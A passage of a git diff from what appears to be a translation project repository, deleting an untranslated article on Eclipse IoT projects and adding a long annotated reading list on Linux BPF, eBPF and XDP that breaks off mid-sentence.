+[6]:https://blog.docker.com/tag/docker-orchestration/ +[7]:https://blog.docker.com/tag/docker-secrets/ +[8]:https://blog.docker.com/tag/docker-security/ +[9]:https://blog.docker.com/tag/docker-swarm/ +[10]:https://blog.docker.com/tag/least-privilege-orchestrator/ +[11]:https://blog.docker.com/tag/tls/ +[12]:https://diogomonica.com/2017/03/27/why-you-shouldnt-use-env-variables-for-secret-data/ diff --git a/sources/tech/20171020 How Eclipse is advancing IoT development.md b/sources/tech/20171020 How Eclipse is advancing IoT development.md deleted file mode 100644 index 30fd8eb64d..0000000000 --- a/sources/tech/20171020 How Eclipse is advancing IoT development.md +++ /dev/null @@ -1,83 +0,0 @@ -apply for translating - -How Eclipse is advancing IoT development -============================================================ - -### Open source organization's modular approach to development is a good match for the Internet of Things. - -![How Eclipse is advancing IoT development](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/OSDC_BUS_ArchitectureOfParticipation_520x292.png?itok=FA0Uuwzv "How Eclipse is advancing IoT development") -Image by : opensource.com - -[Eclipse][3] may not be the first open source organization that pops to mind when thinking about Internet of Things (IoT) projects. After all, the foundation has been around since 2001, long before IoT was a household word, supporting a community for commercially viable open source software development. - -September's Eclipse IoT Day, held in conjunction with RedMonk's [ThingMonk 2017][4] event, emphasized the big role Eclipse is taking in [IoT development][5]. It currently hosts 28 projects that touch a wide range of IoT needs and projects. While at the conference, I talked with [Ian Skerritt][6], who heads marketing for Eclipse, about Eclipse's IoT projects and how Eclipse thinks about IoT more broadly. - -### What's new about IoT? - -I asked Ian how IoT is different from traditional industrial automation, given that sensors and tools have been connected in factories for the past several decades. Ian notes that many factories still are not connected. - -Additionally, he says, "SCADA [supervisory control and data analysis] systems and even the factory floor technology are very proprietary, very siloed. It's hard to change it. It's hard to adapt to it… Right now, when you set up a manufacturing run, you need to manufacture hundreds of thousands of that piece, of that unit. What [manufacturers] want to do is to meet customer demand, to have manufacturing processes that are very flexible, that you can actually do a lot size of one." That's a big piece of what IoT is bringing to manufacturing. - -### Eclipse's approach to IoT - -He describes Eclipse's involvement in IoT by saying: "There's core fundamental technology that every IoT solution needs," and by using open source, "everyone can use it so they can get broader adoption." He says Eclipse see IoT as consisting of three connected software stacks. At a high level, these stacks mirror the (by now familiar) view that IoT can usually be described as spanning three layers. A given implementation may have even more layers, but they still generally map to the functions of this three-layer model: - -* A stack of software for constrained devices (e.g., the device, endpoint, microcontroller unit (MCU), sensor hardware). - -* Some type of gateway that aggregates information and data from the different sensors and sends it to the network. This layer also may take real-time actions based on what the sensors are observing. - -* A software stack for the IoT platform on the backend. This backend cloud stores the data and can provide services based on collected data, such as analysis of historical trends and predictive analytics. - -The three stacks are described in greater detail in Eclipse's whitepaper "[The Three Software Stacks Required for IoT Architectures][7]." - -Ian says that, when developing a solution within those architectures, "there's very specific things that need to be built, but there's a lot of underlying technology that can be used, like messaging protocols, like gateway services. It needs to be a modular approach to scale up to the different use cases that are up there." This encapsulates Eclipse's activities around IoT: Developing modular open source components that can be used to build a range of business-specific services and solutions. - -### Eclipse's IoT projects - -Of Eclipse's many IoT projects currently in use, Ian says two of the most prominent relate to [MQTT][8], a machine-to-machine (M2M) messaging protocol for IoT. Ian describes it as "a publish‑subscribe messaging protocol that was designed specifically for oil and gas pipeline monitoring where power-management network latency is really important. MQTT has been a great success in terms of being a standard that's being widely adopted in IoT." [Eclipse Mosquitto][9] is MQTT's broker and [Eclipse Paho][10] its client. - -[Eclipse Kura][11] is an IoT gateway that, in Ian's words, "provides northbound and southbound connectivity [for] a lot of different protocols" including Bluetooth, Modbus, controller-area network (CAN) bus, and OPC Unified Architecture, with more being added all the time. One benefit, he says, is "instead of you writing your own connectivity, Kura provides that and then connects you to the network via satellite, via Ethernet, or anything." In addition, it handles firewall configuration, network latency, and other functions. "If the network goes down, it will store messages until it comes back up," Ian says. - -A newer project, [Eclipse Kapua][12], is taking a microservices approach to providing different services for an IoT cloud platform. For example, it handles aspects of connectivity, integration, management, storage, and analysis. Ian describes it as "up and coming. It's not being deployed yet, but Eurotech and Red Hat are very active in that." - -Ian says [Eclipse hawkBit][13], which manages software updates, is one of the "most intriguing projects. From a security perspective, if you can't update your device, you've got a huge security hole." Most IoT security disasters are related to non-updated devices, he says. "HawkBit basically manages the backend of how you do scalable updates across your IoT system." - -Indeed, the difficulty of updating software in IoT devices is regularly cited as one of its biggest security challenges. IoT devices aren't always connected and may be numerous, plus update processes for constrained devices can be hard to consistently get right. For this reason, projects relating to updating IoT software are likely to be important going forward. - -### Why IoT is a good fit for Eclipse - -One of the trends we've seen in IoT development has been around building blocks that are integrated and applied to solve particular business problems, rather than monolithic IoT platforms that apply across industries and companies. This is a good fit with Eclipse's approach to IoT, which focuses on a number of modular stacks; projects that provide specific and commonly needed functions; and brokers, gateways, and protocols that can tie together the components needed for a given implementation. - --------------------------------------------------------------------------------- - -作者简介: - -Gordon Haff - Gordon Haff is Red Hat’s cloud evangelist, is a frequent and highly acclaimed speaker at customer and industry events, and helps develop strategy across Red Hat’s full portfolio of cloud solutions. He is the author of Computing Next: How the Cloud Opens the Future in addition to numerous other publications. Prior to Red Hat, Gordon wrote hundreds of research notes, was frequently quoted in publications like The New York Times on a wide range of IT topics, and advised clients on product and... - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/10/eclipse-and-iot - -作者:[Gordon Haff ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/ghaff -[1]:https://opensource.com/article/17/10/eclipse-and-iot?rate=u1Wr-MCMFCF4C45IMoSPUacCatoqzhdKz7NePxHOvwg -[2]:https://opensource.com/user/21220/feed -[3]:https://www.eclipse.org/home/ -[4]:http://thingmonk.com/ -[5]:https://iot.eclipse.org/ -[6]:https://twitter.com/ianskerrett -[7]:https://iot.eclipse.org/resources/white-papers/Eclipse%20IoT%20White%20Paper%20-%20The%20Three%20Software%20Stacks%20Required%20for%20IoT%20Architectures.pdf -[8]:http://mqtt.org/ -[9]:https://projects.eclipse.org/projects/technology.mosquitto -[10]:https://projects.eclipse.org/projects/technology.paho -[11]:https://www.eclipse.org/kura/ -[12]:https://www.eclipse.org/kapua/ -[13]:https://eclipse.org/hawkbit/ -[14]:https://opensource.com/users/ghaff -[15]:https://opensource.com/users/ghaff -[16]:https://opensource.com/article/17/10/eclipse-and-iot#comments diff --git a/sources/tech/20171102 Dive into BPF a list of reading material.md b/sources/tech/20171102 Dive into BPF a list of reading material.md new file mode 100644 index 0000000000..f4b90bd09d --- /dev/null +++ b/sources/tech/20171102 Dive into BPF a list of reading material.md @@ -0,0 +1,711 @@ +Dive into BPF: a list of reading material +============================================================ + +* [What is BPF?][143] + +* [Dive into the bytecode][144] + +* [Resources][145] + * [Generic presentations][23] + * [About BPF][1] + + * [About XDP][2] + + * [About other components related or based on eBPF][3] + + * [Documentation][24] + * [About BPF][4] + + * [About tc][5] + + * [About XDP][6] + + * [About P4 and BPF][7] + + * [Tutorials][25] + + * [Examples][26] + * [From the kernel][8] + + * [From package iproute2][9] + + * [From bcc set of tools][10] + + * [Manual pages][11] + + * [The code][27] + * [BPF code in the kernel][12] + + * [XDP hooks code][13] + + * [BPF logic in bcc][14] + + * [Code to manage BPF with tc][15] + + * [BPF utilities][16] + + * [Other interesting chunks][17] + + * [LLVM backend][18] + + * [Running in userspace][19] + + * [Commit logs][20] + + * [Troubleshooting][28] + * [Errors at compilation time][21] + + * [Errors at load and run time][22] + + * [And still more!][29] + + _~ [Updated][146] 2017-11-02 ~_ + +# What is BPF? + +BPF, as in **B**erkeley **P**acket **F**ilter, was initially conceived in 1992 so as to provide a way to filter packets and to avoid useless packet copies from kernel to userspace. It initially consisted in a simple bytecode that is injected from userspace into the kernel, where it is checked by a verifier—to prevent kernel crashes or security issues—and attached to a socket, then run on each received packet. It was ported to Linux a couple of years later, and used for a small number of applications (tcpdump for example). The simplicity of the language as well as the existence of an in-kernel Just-In-Time (JIT) compiling machine for BPF were factors for the excellent performances of this tool. + +Then in 2013, Alexei Starovoitov completely reshaped it, started to add new functionalities and to improve the performances of BPF. This new version is designated as eBPF (for “extended BPF”), while the former becomes cBPF (“classic” BPF). New features such as maps and tail calls appeared. The JIT machines were rewritten. The new language is even closer to native machine language than cBPF was. And also, new attach points in the kernel have been created. + +Thanks to those new hooks, eBPF programs can be designed for a variety of use cases, that divide into two fields of applications. One of them is the domain of kernel tracing and event monitoring. BPF programs can be attached to kprobes and they compare with other tracing methods, with many advantages (and sometimes some drawbacks). + +The other application domain remains network programming. In addition to socket filter, eBPF programs can be attached to tc (Linux traffic control tool) ingress or egress interfaces and perform a variety of packet processing tasks, in an efficient way. This opens new perspectives in the domain. + +And eBPF performances are further leveraged through the technologies developed for the IO Visor project: new hooks have also been added for XDP (“eXpress Data Path”), a new fast path recently added to the kernel. XDP works in conjunction with the Linux stack, and relies on BPF to perform very fast packet processing. + +Even some projects such as P4, Open vSwitch, [consider][155] or started to approach BPF. Some others, such as CETH, Cilium, are entirely based on it. BPF is buzzing, so we can expect a lot of tools and projects to orbit around it soon… + +# Dive into the bytecode + +As for me: some of my work (including for [BEBA][156]) is closely related to eBPF, and several future articles on this site will focus on this topic. Logically, I wanted to somehow introduce BPF on this blog before going down to the details—I mean, a real introduction, more developed on BPF functionalities that the brief abstract provided in first section: What are BPF maps? Tail calls? What do the internals look like? And so on. But there are a lot of presentations on this topic available on the web already, and I do not wish to create “yet another BPF introduction” that would come as a duplicate of existing documents. + +So instead, here is what we will do. After all, I spent some time reading and learning about BPF, and while doing so, I gathered a fair amount of material about BPF: introductions, documentation, but also tutorials or examples. There is a lot to read, but in order to read it, one has to  _find_  it first. Therefore, as an attempt to help people who wish to learn and use BPF, the present article introduces a list of resources. These are various kinds of readings, that hopefully will help you dive into the mechanics of this kernel bytecode. + +# Resources + +![](https://qmonnet.github.io/whirl-offload/img/icons/pic.svg) + +### Generic presentations + +The documents linked below provide a generic overview of BPF, or of some closely related topics. If you are very new to BPF, you can try picking a couple of presentation among the first ones and reading the ones you like most. If you know eBPF already, you probably want to target specific topics instead, lower down in the list. + +### About BPF + +Generic presentations about eBPF: + +* [_Making the Kernel’s Networking Data Path Programmable with BPF and XDP_][53]  (Daniel Borkmann, OSSNA17, Los Angeles, September 2017): + One of the best set of slides available to understand quickly all the basics about eBPF and XDP (mostly for network processing). + +* [The BSD Packet Filter][54] (Suchakra Sharma, June 2017):  + A very nice introduction, mostly about the tracing aspects. + +* [_BPF: tracing and more_][55]  (Brendan Gregg, January 2017): + Mostly about the tracing use cases. + +* [_Linux BPF Superpowers_][56]  (Brendan Gregg, March 2016): + With a first part on the use of **flame graphs**. + +* [_IO Visor_][57]  (Brenden Blanco, SCaLE 14x, January 2016): + Also introduces **IO Visor project**. + +* [_eBPF on the Mainframe_][58]  (Michael Holzheu, LinuxCon, Dubin, October 2015) + +* [_New (and Exciting!) Developments in Linux Tracing_][59]  (Elena Zannoni, LinuxCon, Japan, 2015) + +* [_BPF — in-kernel virtual machine_][60]  (Alexei Starovoitov, February 2015): + Presentation by the author of eBPF. + +* [_Extending extended BPF_][61]  (Jonathan Corbet, July 2014) + +**BPF internals**: + +* Daniel Borkmann has been doing an amazing work to present **the internals** of eBPF, in particular about **its use with tc**, through several talks and papers. + * [_Advanced programmability and recent updates with tc’s cls_bpf_][30]  (netdev 1.2, Tokyo, October 2016): + Daniel provides details on eBPF, its use for tunneling and encapsulation, direct packet access, and other features. + + * [_cls_bpf/eBPF updates since netdev 1.1_][31]  (netdev 1.2, Tokyo, October 2016, part of [this tc workshop][32]) + + * [_On getting tc classifier fully programmable with cls_bpf_][33]  (netdev 1.1, Sevilla, February 2016): + After introducing eBPF, this presentation provides insights on many internal BPF mechanisms (map management, tail calls, verifier). A must-read! For the most ambitious, [the full paper is available here][34]. + + * [_Linux tc and eBPF_][35]  (fosdem16, Brussels, Belgium, January 2016) + + * [_eBPF and XDP walkthrough and recent updates_][36]  (fosdem17, Brussels, Belgium, February 2017) + + These presentations are probably one of the best sources of documentation to understand the design and implementation of internal mechanisms of eBPF. + +The [**IO Visor blog**][157] has some interesting technical articles about BPF. Some of them contain a bit of marketing talks. + +**Kernel tracing**: summing up all existing methods, including BPF: + +* [_Meet-cute between eBPF and Kerne Tracing_][62]  (Viller Hsiao, July 2016): + Kprobes, uprobes, ftrace + +* [_Linux Kernel Tracing_][63]  (Viller Hsiao, July 2016): + Systemtap, Kernelshark, trace-cmd, LTTng, perf-tool, ftrace, hist-trigger, perf, function tracer, tracepoint, kprobe/uprobe… + +Regarding **event tracing and monitoring**, Brendan Gregg uses eBPF a lot and does an excellent job at documenting some of his use cases. If you are in kernel tracing, you should see his blog articles related to eBPF or to flame graphs. Most of it are accessible [from this article][158] or by browsing his blog. + +Introducing BPF, but also presenting **generic concepts of Linux networking**: + +* [_Linux Networking Explained_][64]  (Thomas Graf, LinuxCon, Toronto, August 2016) + +* [_Kernel Networking Walkthrough_][65]  (Thomas Graf, LinuxCon, Seattle, August 2015) + +**Hardware offload**: + +* eBPF with tc or XDP supports hardware offload, starting with Linux kernel version 4.9 and introduced by Netronome. Here is a presentation about this feature: + [eBPF/XDP hardware offload to SmartNICs][147] (Jakub Kicinski and Nic Viljoen, netdev 1.2, Tokyo, October 2016) + +About **cBPF**: + +* [_The BSD Packet Filter: A New Architecture for User-level Packet Capture_][66]  (Steven McCanne and Van Jacobson, 1992): + The original paper about (classic) BPF. + +* [The FreeBSD manual page about BPF][67] is a useful resource to understand cBPF programs. + +* Daniel Borkmann realized at least two presentations on cBPF, [one in 2013 on mmap, BPF and Netsniff-NG][68], and [a very complete one in 2014 on tc and cls_bpf][69]. + +* On Cloudflare’s blog, Marek Majkowski presented his [use of BPF bytecode with the `xt_bpf`module for **iptables**][70]. It is worth mentioning that eBPF is also supported by this module, starting with Linux kernel 4.10 (I do not know of any talk or article about this, though). + +* [Libpcap filters syntax][71] + +### About XDP + +* [XDP overview][72] on the IO Visor website. + +* [_eXpress Data Path (XDP)_][73]  (Tom Herbert, Alexei Starovoitov, March 2016): + The first presentation about XDP. + +* [_BoF - What Can BPF Do For You?_][74]  (Brenden Blanco, LinuxCon, Toronto, August 2016). + +* [_eXpress Data Path_][148]  (Brenden Blanco, Linux Meetup at Santa Clara, July 2016): + Contains some (somewhat marketing?) **benchmark results**! With a single core: + * ip routing drop: ~3.6 million packets per second (Mpps) + + * tc (with clsact qdisc) drop using BPF: ~4.2 Mpps + + * XDP drop using BPF: 20 Mpps (<10 % CPU utilization) + + * XDP forward (on port on which the packet was received) with rewrite: 10 Mpps + + (Tests performed with the mlx4 driver). + +* Jesper Dangaard Brouer has several excellent sets of slides, that are essential to fully understand the internals of XDP. + * [_XDP − eXpress Data Path, Intro and future use-cases_][37]  (September 2016): + _“Linux Kernel’s fight against DPDK”_ . **Future plans** (as of this writing) for XDP and comparison with DPDK. + + * [_Network Performance Workshop_][38]  (netdev 1.2, Tokyo, October 2016): + Additional hints about XDP internals and expected evolution. + + * [_XDP – eXpress Data Path, Used for DDoS protection_][39]  (OpenSourceDays, March 2017): + Contains details and use cases about XDP, with **benchmark results**, and **code snippets** for **benchmarking** as well as for **basic DDoS protection** with eBPF/XDP (based on an IP blacklisting scheme). + + * [_Memory vs. Networking, Provoking and fixing memory bottlenecks_][40]  (LSF Memory Management Summit, March 2017): + Provides a lot of details about current **memory issues** faced by XDP developers. Do not start with this one, but if you already know XDP and want to see how it really works on the page allocation side, this is a very helpful resource. + + * [_XDP for the Rest of Us_][41]  (netdev 2.1, Montreal, April 2017), with Andy Gospodarek: + How to get started with eBPF and XDP for normal humans. This presentation was also summarized by Julia Evans on [her blog][42]. + + (Jesper also created and tries to extend some documentation about eBPF and XDP, see [related section][75].) + +* [_XDP workshop — Introduction, experience, and future development_][76]  (Tom Herbert, netdev 1.2, Tokyo, October 2016) — as of this writing, only the video is available, I don’t know if the slides will be added. + +* [_High Speed Packet Filtering on Linux_][149]  (Gilberto Bertin, DEF CON 25, Las Vegas, July 2017) — an excellent introduction to state-of-the-art packet filtering on Linux, oriented towards DDoS protection, talking about packet processing in the kernel, kernel bypass, XDP and eBPF. + +### About other components related or based on eBPF + +* [_P4 on the Edge_][77]  (John Fastabend, May 2016): + Presents the use of **P4**, a description language for packet processing, with BPF to create high-performance programmable switches. + +* If you like audio presentations, there is an associated [OvS Orbit episode (#11), called  _**P4** on the Edge_][78] , dating from August 2016\. OvS Orbit are interviews realized by Ben Pfaff, who is one of the core maintainers of Open vSwitch. In this case, John Fastabend is interviewed. + +* [_P4, EBPF and Linux TC Offload_][79]  (Dinan Gunawardena and Jakub Kicinski, August 2016): + Another presentation on **P4**, with some elements related to eBPF hardware offload on Netronome’s **NFP** (Network Flow Processor) architecture. + +* **Cilium** is a technology initiated by Cisco and relying on BPF and XDP to provide “fast in-kernel networking and security policy enforcement for containers based on eBPF programs generated on the fly”. [The code of this project][150] is available on GitHub. Thomas Graf has been performing a number of presentations of this topic: + * [_Cilium: Networking & Security for Containers with BPF & XDP_][43] , also featuring a load balancer use case (Linux Plumbers conference, Santa Fe, November 2016) + + * [_Cilium: Networking & Security for Containers with BPF & XDP_][44]  (Docker Distributed Systems Summit, October 2016 — [video][45]) + + * [_Cilium: Fast IPv6 container Networking with BPF and XDP_][46]  (LinuxCon, Toronto, August 2016) + + * [_Cilium: BPF & XDP for containers_][47]  (fosdem17, Brussels, Belgium, February 2017) + + A good deal of contents is repeated between the different presentations; if in doubt, just pick the most recent one. Daniel Borkmann has also written [a generic introduction to Cilium][80] as a guest author on Google Open Source blog. + +* There are also podcasts about **Cilium**: an [OvS Orbit episode (#4)][81], in which Ben Pfaff interviews Thomas Graf (May 2016), and [another podcast by Ivan Pepelnjak][82], still with Thomas Graf about eBPF, P4, XDP and Cilium (October 2016). + +* **Open vSwitch** (OvS), and its related project **Open Virtual Network** (OVN, an open source network virtualization solution) are considering to use eBPF at various level, with several proof-of-concept prototypes already implemented: + + * [Offloading OVS Flow Processing using eBPF][48] (William (Cheng-Chun) Tu, OvS conference, San Jose, November 2016) + + * [Coupling the Flexibility of OVN with the Efficiency of IOVisor][49] (Fulvio Risso, Matteo Bertrone and Mauricio Vasquez Bernal, OvS conference, San Jose, November 2016) + + These use cases for eBPF seem to be only at the stage of proposals (nothing merge to OvS main branch) as far as I know, but it will be very interesting to see what comes out of it. + +* XDP is envisioned to be of great help for protection against Distributed Denial-of-Service (DDoS) attacks. More and more presentations focus on this. For example, the talks from people from Cloudflare ( [_XDP in practice: integrating XDP in our DDoS mitigation pipeline_][83] ) or from Facebook ( [_Droplet: DDoS countermeasures powered by BPF + XDP_][84] ) at the netdev 2.1 conference in Montreal, Canada, in April 2017, present such use cases. + +* [_CETH for XDP_][85]  (Yan Chan and Yunsong Lu, Linux Meetup, Santa Clara, July 2016): + **CETH** stands for Common Ethernet Driver Framework for faster network I/O, a technology initiated by Mellanox. + +* [**The VALE switch**][86], another virtual switch that can be used in conjunction with the netmap framework, has [a BPF extension module][87]. + +* **Suricata**, an open source intrusion detection system, [seems to rely on eBPF components][88] for its “capture bypass” features: + [_The adventures of a Suricate in eBPF land_][89]  (Éric Leblond, netdev 1.2, Tokyo, October 2016) + [_eBPF and XDP seen from the eyes of a meerkat_][90]  (Éric Leblond, Kernel Recipes, Paris, September 2017) + +* [InKeV: In-Kernel Distributed Network Virtualization for DCN][91] (Z. Ahmed, M. H. Alizai and A. A. Syed, SIGCOMM, August 2016): + **InKeV** is an eBPF-based datapath architecture for virtual networks, targeting data center networks. It was initiated by PLUMgrid, and claims to achieve better performances than OvS-based OpenStack solutions. + +* [_**gobpf** - utilizing eBPF from Go_][92]  (Michael Schubert, fosdem17, Brussels, Belgium, February 2017): + A “library to create, load and use eBPF programs from Go” + +* [**ply**][93] is a small but flexible open source dynamic **tracer** for Linux, with some features similar to the bcc tools, but with a simpler language inspired by awk and dtrace, written by Tobias Waldekranz. + +* If you read my previous article, you might be interested in this talk I gave about [implementing the OpenState interface with eBPF][151], for stateful packet processing, at fosdem17. + +![](https://qmonnet.github.io/whirl-offload/img/icons/book.svg) + +### Documentation + +Once you managed to get a broad idea of what BPF is, you can put aside generic presentations and start diving into the documentation. Below are the most complete documents about BPF specifications and functioning. Pick the one you need and read them carefully! + +### About BPF + +* The **specification of BPF** (both classic and extended versions) can be found within the documentation of the Linux kernel, and in particular in file[linux/Documentation/networking/filter.txt][94]. The use of BPF as well as its internals are documented there. Also, this is where you can find **information about errors thrown by the verifier** when loading BPF code fails. Can be helpful to troubleshoot obscure error messages. + +* Also in the kernel tree, there is a document about **frequent Questions & Answers** on eBPF design in file [linux/Documentation/bpf/bpf_design_QA.txt][95]. + +* … But the kernel documentation is dense and not especially easy to read. If you look for a simple description of eBPF language, head for [its **summarized description**][96] on the IO Visor GitHub repository instead. + +* By the way, the IO Visor project gathered a lot of **resources about BPF**. Mostly, it is split between[the documentation directory][97] of its bcc repository, and the whole content of [the bpf-docs repository][98], both on GitHub. Note the existence of this excellent [BPF **reference guide**][99] containing a detailed description of BPF C and bcc Python helpers. + +* To hack with BPF, there are some essential **Linux manual pages**. The first one is [the `bpf(2)` man page][100] about the `bpf()` **system call**, which is used to manage BPF programs and maps from userspace. It also contains a description of BPF advanced features (program types, maps and so on). The second one is mostly addressed to people wanting to attach BPF programs to tc interface: it is [the `tc-bpf(8)` man page][101], which is a reference for **using BPF with tc**, and includes some example commands and samples of code. + +* Jesper Dangaard Brouer initiated an attempt to **update eBPF Linux documentation**, including **the different kinds of maps**. [He has a draft][102] to which contributions are welcome. Once ready, this document should be merged into the man pages and into kernel documentation. + +* The Cilium project also has an excellent [**BPF and XDP Reference Guide**][103], written by core eBPF developers, that should prove immensely useful to any eBPF developer. + +* David Miller has sent several enlightening emails about eBPF/XDP internals on the [xdp-newbies][152]mailing list. I could not find a link that gathers them at a single place, so here is a list: + * [bpf.h and you…][50] + + * [Contextually speaking…][51] + + * [BPF Verifier Overview][52] + + The last one is possibly the best existing summary about the verifier at this date. + +* Ferris Ellis started [a **blog post series about eBPF**][104]. As I write this paragraph, the first article is out, with some historical background and future expectations for eBPF. Next posts should be more technical, and look promising. + +* [A **list of BPF features per kernel version**][153] is available in bcc repository. Useful is you want to know the minimal kernel version that is required to run a given feature. I contributed and added the links to the commits that introduced each feature, so you can also easily access the commit logs from there. + +### About tc + +When using BPF for networking purposes in conjunction with tc, the Linux tool for **t**raffic **c**ontrol, one may wish to gather information about tc’s generic functioning. Here are a couple of resources about it. + +* It is difficult to find simple tutorials about **QoS on Linux**. The two links I have are long and quite dense, but if you can find the time to read it you will learn nearly everything there is to know about tc (nothing about BPF, though). There they are:  [_Traffic Control HOWTO_  (Martin A. Brown, 2006)][105], and the  [_Linux Advanced Routing & Traffic Control HOWTO_  (“LARTC”) (Bert Hubert & al., 2002)][106]. + +* **tc manual pages** may not be up-to-date on your system, since several of them have been added lately. If you cannot find the documentation for a particular queuing discipline (qdisc), class or filter, it may be worth checking the latest [manual pages for tc components][107]. + +* Some additional material can be found within the files of iproute2 package itself: the package contains [some documentation][108], including some files that helped me understand better [the functioning of **tc’s actions**][109]. + **Edit:** While still available from the Git history, these files have been deleted from iproute2 in October 2017. + +* Not exactly documentation: there was [a workshop about several tc features][110] (including filtering, BPF, tc offload, …) organized by Jamal Hadi Salim during the netdev 1.2 conference (October 2016). + +* Bonus information—If you use `tc` a lot, here are some good news: I [wrote a bash completion function][111] for this tool, and it should be shipped with package iproute2 coming with kernel version 4.6 and higher! + +### About XDP + +* Some [work-in-progress documentation (including specifications)][112] for XDP started by Jesper Dangaard Brouer, but meant to be a collaborative work. Under progress (September 2016): you should expect it to change, and maybe to be moved at some point (Jesper [called for contribution][113], if you feel like improving it). + +* The [BPF and XDP Reference Guide][114] from Cilium project… Well, the name says it all. + +### About P4 and BPF + +[P4][159] is a language used to specify the behavior of a switch. It can be compiled for a number of hardware or software targets. As you may have guessed, one of these targets is BPF… The support is only partial: some P4 features cannot be translated towards BPF, and in a similar way there are things that BPF can do but that would not be possible to express with P4\. Anyway, the documentation related to **P4 use with BPF** [used to be hidden in bcc repository][160]. This changed with P4_16 version, the p4c reference compiler including [a backend for eBPF][161]. + +![](https://qmonnet.github.io/whirl-offload/img/icons/flask.svg) + +### Tutorials + +Brendan Gregg has produced excellent **tutorials** intended for people who want to **use bcc tools** for tracing and monitoring events in the kernel. [The first tutorial about using bcc itself][162] comes with eleven steps (as of today) to understand how to use the existing tools, while [the one **intended for Python developers**][163] focuses on developing new tools, across seventeen “lessons”. + +Sasha Goldshtein also has some  [_**Linux Tracing Workshops Materials**_][164]  involving the use of several BPF tools for tracing. + +Another post by Jean-Tiare Le Bigot provides a detailed (and instructive!) example of [using perf and eBPF to setup a low-level tracer][165] for ping requests and replies + +Few tutorials exist for network-related eBPF use cases. There are some interesting documents, including an  _eBPF Offload Starting Guide_ , on the [Open NFP][166] platform operated by Netronome. Other than these, the talk from Jesper,  [_XDP for the Rest of Us_][167] , is probably one of the best ways to get started with XDP. + +![](https://qmonnet.github.io/whirl-offload/img/icons/gears.svg) + +### Examples + +It is always nice to have examples. To see how things really work. But BPF program samples are scattered across several projects, so I listed all the ones I know of. The examples do not always use the same helpers (for instance, tc and bcc both have their own set of helpers to make it easier to write BPF programs in C language). + +### From the kernel + +The kernel contains examples for most types of program: filters to bind to sockets or to tc interfaces, event tracing/monitoring, and even XDP. You can find these examples under the [linux/samples/bpf/][168]directory. + +Also do not forget to have a look to the logs related to the (git) commits that introduced a particular feature, they may contain some detailed example of the feature. + +### From package iproute2 + +The iproute2 package provide several examples as well. They are obviously oriented towards network programming, since the programs are to be attached to tc ingress or egress interfaces. The examples dwell under the [iproute2/examples/bpf/][169] directory. + +### From bcc set of tools + +Many examples are [provided with bcc][170]: + +* Some are networking example programs, under the associated directory. They include socket filters, tc filters, and a XDP program. + +* The `tracing` directory include a lot of example **tracing programs**. The tutorials mentioned earlier are based on these. These programs cover a wide range of event monitoring functions, and some of them are production-oriented. Note that on certain Linux distributions (at least for Debian, Ubuntu, Fedora, Arch Linux), these programs have been [packaged][115] and can be “easily” installed by typing e.g. `# apt install bcc-tools`, but as of this writing (and except for Arch Linux), this first requires to set up IO Visor’s own package repository. + +* There are also some examples **using Lua** as a different BPF back-end (that is, BPF programs are written with Lua instead of a subset of C, allowing to use the same language for front-end and back-end), in the third directory. + +### Manual pages + +While bcc is generally the easiest way to inject and run a BPF program in the kernel, attaching programs to tc interfaces can also be performed by the `tc` tool itself. So if you intend to **use BPF with tc**, you can find some example invocations in the [`tc-bpf(8)` manual page][171]. + +![](https://qmonnet.github.io/whirl-offload/img/icons/srcfile.svg) + +### The code + +Sometimes, BPF documentation or examples are not enough, and you may have no other solution that to display the code in your favorite text editor (which should be Vim of course) and to read it. Or you may want to hack into the code so as to patch or add features to the machine. So here are a few pointers to the relevant files, finding the functions you want is up to you! + +### BPF code in the kernel + +* The file [linux/include/linux/bpf.h][116] and its counterpart [linux/include/uapi/bpf.h][117] contain **definitions** related to eBPF, to be used respectively in the kernel and to interface with userspace programs. + +* On the same pattern, files [linux/include/linux/filter.h][118] and [linux/include/uapi/filter.h][119] contain information used to **run the BPF programs**. + +* The **main pieces of code** related to BPF are under [linux/kernel/bpf/][120] directory. **The different operations permitted by the system call**, such as program loading or map management, are implemented in file `syscall.c`, while `core.c` contains the **interpreter**. The other files have self-explanatory names: `verifier.c` contains the **verifier** (no kidding), `arraymap.c` the code used to interact with **maps** of type array, and so on. + +* The **helpers**, as well as several functions related to networking (with tc, XDP…) and available to the user, are implemented in [linux/net/core/filter.c][121]. It also contains the code to migrate cBPF bytecode to eBPF (since all cBPF programs are now translated to eBPF in the kernel before being run). + +* The **JIT compilers** are under the directory of their respective architectures, such as file[linux/arch/x86/net/bpf_jit_comp.c][122] for x86. + +* You will find the code related to **the BPF components of tc** in the [linux/net/sched/][123] directory, and in particular in files `act_bpf.c` (action) and `cls_bpf.c` (filter). + +* I have not hacked with **event tracing** in BPF, so I do not really know about the hooks for such programs. There is some stuff in [linux/kernel/trace/bpf_trace.c][124]. If you are interested in this and want to know more, you may dig on the side of Brendan Gregg’s presentations or blog posts. + +* Nor have I used **seccomp-BPF**. But the code is in [linux/kernel/seccomp.c][125], and some example use cases can be found in [linux/tools/testing/selftests/seccomp/seccomp_bpf.c][126]. + +### XDP hooks code + +Once loaded into the in-kernel BPF virtual machine, **XDP** programs are hooked from userspace into the kernel network path thanks to a Netlink command. On reception, the function `dev_change_xdp_fd()` in file [linux/net/core/dev.c][172] is called and sets a XDP hook. Such hooks are located in the drivers of supported NICs. For example, the mlx4 driver used for some Mellanox hardware has hooks implemented in files under the [drivers/net/ethernet/mellanox/mlx4/][173] directory. File en_netdev.c receives Netlink commands and calls `mlx4_xdp_set()`, which in turns calls for instance `mlx4_en_process_rx_cq()` (for the RX side) implemented in file en_rx.c. + +### BPF logic in bcc + +One can find the code for the **bcc** set of tools [on the bcc GitHub repository][174]. The **Python code**, including the `BPF` class, is initiated in file [bcc/src/python/bcc/__init__.py][175]. But most of the interesting stuff—to my opinion—such as loading the BPF program into the kernel, happens [in the libbcc **C library**][176]. + +### Code to manage BPF with tc + +The code related to BPF **in tc** comes with the iproute2 package, of course. Some of it is under the[iproute2/tc/][177] directory. The files f_bpf.c and m_bpf.c (and e_bpf.c) are used respectively to handle BPF filters and actions (and tc `exec` command, whatever this may be). File q_clsact.c defines the `clsact` qdisc especially created for BPF. But **most of the BPF userspace logic** is implemented in[iproute2/lib/bpf.c][178] library, so this is probably where you should head to if you want to mess up with BPF and tc (it was moved from file 